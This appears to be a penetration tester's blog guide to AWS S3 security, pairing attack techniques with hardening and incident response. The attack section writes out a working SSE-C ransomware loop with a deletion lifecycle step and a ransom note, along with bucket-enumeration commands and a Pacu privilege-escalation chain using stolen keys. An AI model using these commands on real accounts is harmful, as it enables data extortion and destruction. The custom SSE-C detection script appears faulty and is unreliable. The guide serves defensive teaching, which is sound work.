AWS S3 Security Field Guide

Vinay VarmaVinay Varma
8 min read

Let's talk about something that keeps me up at night: AWS S3 buckets. If you're in security, you know these things are everywhere. They're storing everything from startup MVPs to Fortune 500’s most valuable data. And they're getting hammered by threat actors in ways we didn't see coming even six months ago.

I've been pentesting AWS environments for years, and the game has completely changed. We're not just dealing with public buckets anymore (though those are still embarrassingly common). The latest attacks, like the Codefinger ransomware campaign, are using AWS's own Server-Side Encryption with Customer Provided Keys (SSE-C) to lock companies out of their own data. No vulnerability exploitation needed just stolen credentials and AWS's own features turned into attack vectors.

This guide walks through both sides of the battlefield. I'll show you exactly how attackers are breaking in (with the actual commands and tools), and then flip the script to show you how to lock things down properly. This is what's happening right now in the wild.

Part 1: The Attack Side - How S3 Buckets Get Owned

The New Ransomware Playbook

Let's start with the scariest development of 2025. The Codefinger group discovered they could use SSE-C to encrypt S3 data with their own AES-256 keys, and AWS only logs an HMAC of the key not the key itself. Once they encrypt your data, it's gone. There's literally no recovery without paying the ransom.

Here's how the attack actually works:

# Step 1: Attacker gets your AWS keys (phishing, exposed in code, etc.)
# Step 2: They enumerate your buckets
aws s3 ls --profile stolen-creds

# Step 3: Download and re-encrypt each file with their key
for file in $(aws s3 ls s3://victim-bucket --recursive | awk '{print $4}'); do
    # Download the file
    aws s3 cp s3://victim-bucket/$file /tmp/temp-file

# Re-upload with attacker's encryption key
    aws s3 cp /tmp/temp-file s3://victim-bucket/$file \
        --sse-c AES256 \
        --sse-c-key [32-byte-key-attacker-controls]
done

# Step 4: Set lifecycle policy to delete in 7 days
aws s3api put-bucket-lifecycle-configuration --bucket victim-bucket \
    --lifecycle-configuration file://delete-in-7-days.json

# Step 5: Drop the ransom note
echo "Pay 10 BTC to wallet xyz or lose your data forever" > RANSOM.txt
aws s3 cp RANSOM.txt s3://victim-bucket/

What makes this particularly nasty is that no data leaves AWS. Traditional DLP tools see nothing suspicious it's all legitimate AWS API calls within your own environment.

Modern Bucket Hunting Techniques

Forget the old "try random bucket names" approach. Modern attackers are way more sophisticated:

DNS-Based Enumeration (The Stealthy Approach)

s3enum Tool

# Using s3enum - doesn't hit AWS APIs directly
# Generate permutations and check via DNS
./s3enum -wordlist company-terms.txt -suffixlist common-suffixes.txt targetcorp
# This checks: targetcorp-dev, targetcorp-prod, targetcorp-backup, etc.
# All through DNS lookups, not AWS API calls

Certificate Transparency Logs

Smart attackers are using CT logs to find S3 buckets:

# Query crt.sh for subdomains
curl -s "https://crt.sh/?q=%25.targetcorp.com&output=json" | \
    jq -r '.[].name_value' | \
    grep -E "s3|bucket|storage" | \
    sort -u

GitHub Goldmine

# Search for exposed bucket names in code
github-dorks -d github.com -t [token] \
    -q "s3.amazonaws.com extension:yml targetcorp"
# Common patterns that leak bucket names:
# - Terraform files
# - Docker configs  
# - CI/CD pipelines
# - JavaScript source maps

Privilege Escalation with Pacu

Pacu is basically the Metasploit of AWS it's an exploitation framework designed for post-compromise attacks. Here's a real attack chain I've used in authorized tests:

# Install Pacu
pipx install git+https://github.com/RhinoSecurityLabs/pacu.git

# Start a new session
pacu
> create mybreach

# Import compromised keys
> set_keys
Key alias: pwned-dev
Access key ID: AKIA[...]
Secret key: [...]

# Phase 1: Enumerate everything
> run iam__enum_permissions --all-users
> run aws__enum_account
> run s3__enum

# Phase 2: Look for escalation paths
> run iam__privesc_scan

# Example output might show:
# User 'dev-deploy' can assume role 'ProductionAdmin'
# User 'ci-bot' has iam:CreatePolicyVersion permission

# Phase 3: Exploit the escalation
> run iam__privesc_through_create_policy_version \
    --policy-arn arn:aws:iam::123456789:policy/dev-policy

Pacu can test S3 bucket configurations, establish Lambda backdoors, compromise EC2 instances, and even disrupt CloudTrail and GuardDuty monitoring.

The Supply Chain Attack Vector

Here's something that doesn't get enough attention. Abandoned S3 buckets are a massive problem. I've seen this pattern repeatedly:

  1. Company creates updates.mycompany.com S3 bucket

  2. Hardcodes the URL in their app/documentation

  3. Later migrates away and deletes the bucket

  4. Attacker claims the bucket name (they're globally unique)

  5. Now the attacker controls a trusted endpoint

Real example: An enterprise VPN solution was fetching config from a deleted S3 bucket. An attacker could have owned the entire corporate network just by creating that bucket and serving malicious configs.

Part 2: The Defense Side - Locking Down Your S3

Priority 1: Block the SSE-C Ransomware Attack

AWS now recommends blocking SSE-C entirely if you don't use it, either through bucket policies or Resource Control Policies (RCPs) at the organization level.

Here's the bucket policy that stops it cold:

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "DenySSECUploads",
      "Effect": "Deny",
      "Principal": "*",
      "Action": "s3:PutObject",
      "Resource": "arn:aws:s3:::your-bucket/*",
      "Condition": {
        "StringEquals": {
          "s3:x-amz-server-side-encryption-customer-algorithm": "AES256"
        }
      }
    }
  ]
}

For organization-wide protection, use an RCP:

aws organizations put-resource-policy \
  --content '{
    "Version": "2012-10-17",
    "Statement": [{
      "Effect": "Deny",
      "Action": "s3:PutObject",
      "Resource": "*",
      "Condition": {
        "StringEquals": {
          "s3:x-amz-server-side-encryption-customer-algorithm": "AES256"
        }
      }
    }]
  }'

Priority 2: Detection and Response Automation

GuardDuty with S3 Protection and Extended Threat Detection can now detect potential ransomware attempts using SSE-C. But you need to act on those alerts immediately.

Here's a Lambda function that auto-responds to suspicious S3 activity:

import boto3
import json
from datetime import datetime

def lambda_handler(event, context):
    # Parse GuardDuty finding
    finding = json.loads(event['Records'][0]['Sns']['Message'])

    if 'S3' in finding['Resource']['Type']:
        bucket_name = finding['Resource']['S3BucketDetails'][0]['Name']

        # Immediate containment
        s3 = boto3.client('s3')

        # 1. Block all public access
        s3.put_public_access_block(
            Bucket=bucket_name,
            PublicAccessBlockConfiguration={
                'BlockPublicAcls': True,
                'IgnorePublicAcls': True,
                'BlockPublicPolicy': True,
                'RestrictPublicBuckets': True
            }
        )

        # 2. Enable versioning (if not already)
        s3.put_bucket_versioning(
            Bucket=bucket_name,
            VersioningConfiguration={'Status': 'Enabled'}
        )

        # 3. Create a snapshot tag for incident response
        s3.put_bucket_tagging(
            Bucket=bucket_name,
            Tagging={
                'TagSet': [
                    {'Key': 'IncidentResponse', 'Value': 'Active'},
                    {'Key': 'Timestamp', 'Value': datetime.utcnow().isoformat()}
                ]
            }
        )

        # 4. Notify security team
        sns = boto3.client('sns')
        sns.publish(
            TopicArn='arn:aws:sns:us-east-1:123456789:security-alerts',
            Subject=f'CRITICAL: S3 Bucket {bucket_name} Under Attack',
            Message=json.dumps(finding, indent=2)
        )

    return {'statusCode': 200}

Priority 3: Preventive Controls That Actually Work

The Complete S3 Hardening Checklist

# 1. Account-level Block Public Access (non-negotiable)
aws s3control put-public-access-block \
  --account-id $(aws sts get-caller-identity --query Account --output text) \
  --public-access-block-configuration \
    BlockPublicAcls=true,IgnorePublicAcls=true,BlockPublicPolicy=true,RestrictPublicBuckets=true

# 2. Enable default encryption with KMS (not just AES256)
aws s3api put-bucket-encryption --bucket critical-data \
  --server-side-encryption-configuration '{
    "Rules": [{
      "ApplyServerSideEncryptionByDefault": {
        "SSEAlgorithm": "aws:kms",
        "KMSMasterKeyID": "arn:aws:kms:us-east-1:123456789:key/abc-123"
      }
    }]
  }'

# 3. Enable versioning with MFA delete
aws s3api put-bucket-versioning --bucket critical-data \
  --versioning-configuration Status=Enabled,MFADelete=Enabled \
  --mfa "arn:aws:iam::123456789:mfa/root-user 123456"

# 4. Configure Object Lock for immutability
aws s3api put-object-lock-configuration --bucket critical-data \
  --object-lock-configuration '{
    "ObjectLockEnabled": "Enabled",
    "Rule": {
      "DefaultRetention": {
        "Mode": "GOVERNANCE",
        "Days": 30
      }
    }
  }'

# 5. Enable CloudTrail data events (catches the attacks)
aws cloudtrail put-event-selectors --trail-name security-trail \
  --event-selectors '[{
    "ReadWriteType": "All",
    "IncludeManagementEvents": true,
    "DataResources": [{
      "Type": "AWS::S3::Object",
      "Values": ["arn:aws:s3:::*/*"]
    }]
  }]'

The VPC Endpoint Lock (My Personal Favorite)

This completely prevents internet access to your S3 buckets, even with valid credentials:

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "DenyAllExceptVPCEndpoint",
      "Effect": "Deny",
      "Principal": "*",
      "Action": "s3:*",
      "Resource": [
        "arn:aws:s3:::sensitive-data",
        "arn:aws:s3:::sensitive-data/*"
      ],
      "Condition": {
        "StringNotEquals": {
          "aws:SourceVpce": "vpce-1234567890abcdef0"
        }
      }
    }
  ]
}

Priority 4: Continuous Security Assessment

Tools like Prowler and ScoutSuite provide continuous compliance monitoring, but you need to customize them for your environment:

# Prowler for automated compliance checks
./prowler aws -g s3 -f us-east-1 --output-formats html json

# Custom Prowler check for SSE-C usage
cat << 'EOF' > checks/custom/check_sse_c_usage.sh
#!/bin/bash
for bucket in $(aws s3api list-buckets --query 'Buckets[].Name' --output text); do
  objects=$(aws s3api list-objects-v2 --bucket $bucket \
    --query 'Contents[?ServerSideEncryption==`aws:kms:sse-c`].Key' \
    --output text 2>/dev/null)

  if [ ! -z "$objects" ]; then
    echo "WARNING: Bucket $bucket contains SSE-C encrypted objects"
  fi
done
EOF

Part 3: When Things Go Wrong - Incident Response

If you suspect a Codefinger style attack, here's your immediate response playbook:

# 1. Check for SSE-C usage in CloudTrail
aws logs filter-log-events \
  --log-group-name /aws/cloudtrail/security \
  --filter-pattern '{ $.requestParameters.x-amz-server-side-encryption-customer-algorithm = * }' \
  --start-time $(date -u -d '7 days ago' +%s)000

# 2. Look for mass PutObject operations
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventName,AttributeValue=PutObject \
  --max-results 50 | \
  jq '.Events | group_by(.Username) | map({user: .[0].Username, count: length})'

# 3. Check for lifecycle policy changes
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventName,AttributeValue=PutBucketLifecycleConfiguration

# 4. If ransomware is confirmed, immediately:
# - Revoke the compromised credentials
# - Enable MFA on all accounts
# - Restore from backups (you have backups, right?)
# - Contact AWS Support (they've seen this before)Reality

Here's what nobody wants to admit, most S3 breaches happen because of silly mistakes. Not sophisticated zero-days. Not nation-state actors. Just developers who:

  • Commit AWS keys to GitHub

  • Copy/paste overly permissive IAM policies

  • Forget to turn on Block Public Access

  • Never rotate credentials

  • Store backups in the same account with the same permissions

The tools and techniques I've shown you are powerful, but they're not magic. The real problem, as security researcher Johannes Ullrich points out, is that "the AWS customer leaked access credentials". Fix the basics first.

TL;DR

The S3 threat landscape has evolved dramatically. We've gone from worrying about public buckets to dealing with ransomware that uses AWS's own encryption against us. The threat actors are getting more creative, but so are the defenses.

My advice? Assume breach. Build your S3 security like someone already has your credentials (because they might). Use defense in depth bucket policies, VPC endpoints, encryption, versioning, monitoring, and automated response. Make it so that even with valid credentials, an attacker can't do much damage.

And please, for the love of all that is holy, stop putting AWS keys in your code. Use IAM roles. Use instance profiles. Use anything except long-lived credentials sitting in plaintext.

Stay paranoid, stay patched, and keep those buckets locked down.

References

Tools Used

AWS Security Documentation

Recent Security Advisories

0
Subscribe to my newsletter

Read articles from Vinay Varma directly inside your inbox. Subscribe to the newsletter, and don't miss out.

Written by

Vinay Varma
Vinay Varma

🔒 Security Engineer | Penetration Tester | CTF Player 🎯 Experienced in Product, Cloud & Infrastructure Security. ⚡ Skilled in Application Security, Multi-Cloud Security, Red Teaming, Penetration Testing, and Security Engineering. 🌱 Exploring GenAI 🤖 and LLM Security.